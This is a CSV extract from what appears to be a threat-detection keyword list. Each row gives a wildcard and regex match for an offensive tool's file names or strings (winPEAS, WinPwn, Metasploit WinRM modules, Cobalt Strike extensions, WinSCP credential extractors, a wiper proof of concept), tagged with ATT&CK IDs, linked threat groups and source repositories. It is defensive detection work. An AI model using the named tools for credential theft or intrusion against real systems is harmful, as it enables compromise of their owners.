"*WinPEAS.exe*",".{0,1000}WinPEAS\.exe.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","62787"
"*winPEAS.exe*",".{0,1000}winPEAS\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","62788"
"*winPEAS.Info.FilesInfo.Office.Office*",".{0,1000}winPEAS\.Info\.FilesInfo\.Office\.Office.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","62789"
"*winPEAS.KnownFileCreds.Browsers.Chrome*",".{0,1000}winPEAS\.KnownFileCreds\.Browsers\.Chrome.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","winPEAS","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","62790"
"*winPEAS.KnownFileCreds.Browsers.Chrome*",".{0,1000}winPEAS\.KnownFileCreds\.Browsers\.Chrome.{0,1000}","offensive_tool_keyword","winPEAS","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","winPEAS","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","62791"
"*winPEAS.ps1*",".{0,1000}winPEAS\.ps1.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","62792"
"*winPEAS.txt*",".{0,1000}winPEAS\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","62793"
"*winPEASany.exe*",".{0,1000}winPEASany\.exe.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","62794"
"*winPEASany.exe*",".{0,1000}winPEASany\.exe.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","62795"
"*winPEASany_ofs.exe*",".{0,1000}winPEASany_ofs\.exe.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","62796"
"*winPEASany_ofs.exe*",".{0,1000}winPEASany_ofs\.exe.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","62797"
"*winPEAS-Obfuscated*",".{0,1000}winPEAS\-Obfuscated.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","62798"
"*winPEASps1*",".{0,1000}winPEASps1.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","62799"
"*winPEASx64.exe*",".{0,1000}winPEASx64\.exe.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","62800"
"*winPEASx64.exe*",".{0,1000}winPEASx64\.exe.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","62801"
"*winPEASx64_ofs.exe*",".{0,1000}winPEASx64_ofs\.exe.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","62802"
"*winPEASx86.exe*",".{0,1000}winPEASx86\.exe.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","62803"
"*winPEASx86.exe*",".{0,1000}winPEASx86\.exe.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","62804"
"*winPEASx86_ofs.exe*",".{0,1000}winPEASx86_ofs\.exe.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","62805"
"*winPEASx86_ofs.exe*",".{0,1000}winPEASx86_ofs\.exe.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","62806"
"*Win-PS2EXE.exe*",".{0,1000}Win\-PS2EXE\.exe.{0,1000}","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tool","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","N/A","10","1395","217","2025-01-05T11:26:50Z","2019-11-08T09:25:02Z","62807"
"*WinPwn -*",".{0,1000}WinPwn\s\-.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","62809"
"*WinPwn.exe*",".{0,1000}WinPwn\.exe.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","62810"
"*WinPwn.ps1*",".{0,1000}WinPwn\.ps1.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","62811"
"*winpwnage.functions*",".{0,1000}winpwnage\.functions.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","62812"
"*winpwnage.functions.execute.exe*",".{0,1000}winpwnage\.functions\.execute\.exe.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#content","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","62813"
"*WinPwnageVPN*",".{0,1000}WinPwnageVPN.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#servicename","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","62814"
"*winreconstreamline.bat*",".{0,1000}winreconstreamline\.bat.{0,1000}","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","1","N/A","N/A","N/A","9","861","190","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z","62815"
"*winregistry.py*",".{0,1000}winregistry\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","62816"
"*WinRM already running on port 5985. Unexploitable!*",".{0,1000}WinRM\salready\srunning\son\sport\s5985\.\sUnexploitable!.{0,1000}","offensive_tool_keyword","RogueWinRM","RogueWinRM is a local privilege escalation exploit that allows to escalate from a Service account (with SeImpersonatePrivilege) to Local System account if WinRM service is not running","T1548.003 - T1134.002 - T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RogueWinRM","1","0","N/A","N/A","10","8","788","107","2020-02-23T19:26:41Z","2019-12-02T22:58:03Z","62818"
"*winrm_command_shell.rb*",".{0,1000}winrm_command_shell\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62819"
"*winrm_script_exec.*",".{0,1000}winrm_script_exec\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62820"
"*winrm-detection.py*",".{0,1000}winrm\-detection\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","62821"
"*winrmdll *",".{0,1000}winrmdll\s.{0,1000}","offensive_tool_keyword","cobaltstrike","C++ WinRM API via Reflective DLL","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mez-0/winrmdll","1","0","N/A","N/A","10","10","144","28","2021-09-11T13:44:16Z","2021-09-11T13:40:22Z","62822"
"*winrmdll.*",".{0,1000}winrmdll\..{0,1000}","offensive_tool_keyword","cobaltstrike","C++ WinRM API via Reflective DLL","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mez-0/winrmdll","1","1","N/A","N/A","10","10","144","28","2021-09-11T13:44:16Z","2021-09-11T13:40:22Z","62823"
"*WinSCPPasswdExtractor*",".{0,1000}WinSCPPasswdExtractor.{0,1000}","offensive_tool_keyword","WinSCPPasswdExtractor","Extract WinSCP Credentials from any Windows System or winscp config file","T1003.001 - T1083 - T1145","TA0003 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/NeffIsBack/WinSCPPasswdExtractor","1","1","N/A","N/A","N/A","1","16","3","2025-03-19T15:26:16Z","2022-12-20T11:55:55Z","62828"
"*WinShellcode.git*",".{0,1000}WinShellcode\.git.{0,1000}","offensive_tool_keyword","WinShellcode","It's a C code project created in Visual Studio that helps you generate shellcode from your C code.","T1059.001 - T1059.003 - T1059.005 - T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027","TA0002 - TA0006","N/A","N/A","Exploitation tool","https://github.com/DallasFR/WinShellcode","1","1","N/A","N/A","N/A","","N/A","","","","62829"
"*WinShellcode-main*",".{0,1000}WinShellcode\-main.{0,1000}","offensive_tool_keyword","WinShellcode","It's a C code project created in Visual Studio that helps you generate shellcode from your C code.","T1059.001 - T1059.003 - T1059.005 - T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027","TA0002 - TA0006","N/A","N/A","Exploitation tool","https://github.com/DallasFR/WinShellcode","1","1","N/A","N/A","N/A","","N/A","","","","62830"
"*Winsocky-main*",".{0,1000}Winsocky\-main.{0,1000}","offensive_tool_keyword","cobaltstrike","Winsocket for Cobalt Strike.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/WKL-Sec/Winsocky","1","1","N/A","N/A","10","10","98","18","2023-07-06T11:47:18Z","2023-06-22T07:00:22Z","62831"
"*WINspect.ps1*",".{0,1000}WINspect\.ps1.{0,1000}","offensive_tool_keyword","WINspect","WINspect is part of a larger project for auditing different areas of Windows environments.It focuses on enumerating different parts of a Windows machine to identify security weaknesses and point to components that need further hardening.can be used by attacker ","T1018 - T1082 - T1057 - T1547.001 - T1053","TA0003 - TA0006 - TA0008 - TA0010","N/A","N/A","Reconnaissance","https://github.com/A-mIn3/WINspect","1","1","N/A","N/A","N/A","6","576","100","2019-01-09T12:56:57Z","2017-08-10T15:10:10Z","62832"
"*win-x64-DynamicKernelWinExecCalc*",".{0,1000}win\-x64\-DynamicKernelWinExecCalc.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Metro-Holografix/DInjector","1","1","N/A","private github repo","8","","N/A","","","","62835"
"*Wiper POC tool that wipes a given directory*",".{0,1000}Wiper\sPOC\stool\sthat\swipes\sa\sgiven\sdirectory.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","N/A","10","4","310","39","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z","62836"
"*WiperPoc.exe*",".{0,1000}WiperPoc\.exe.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","N/A","10","4","310","39","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z","62837"
"*WiperPoc\WiperPoc*",".{0,1000}WiperPoc\\WiperPoc.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","N/A","10","4","310","39","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z","62838"
"*wireghoul/htshells*",".{0,1000}wireghoul\/htshells.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","N/A","10","10","1048","193","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z","62839"
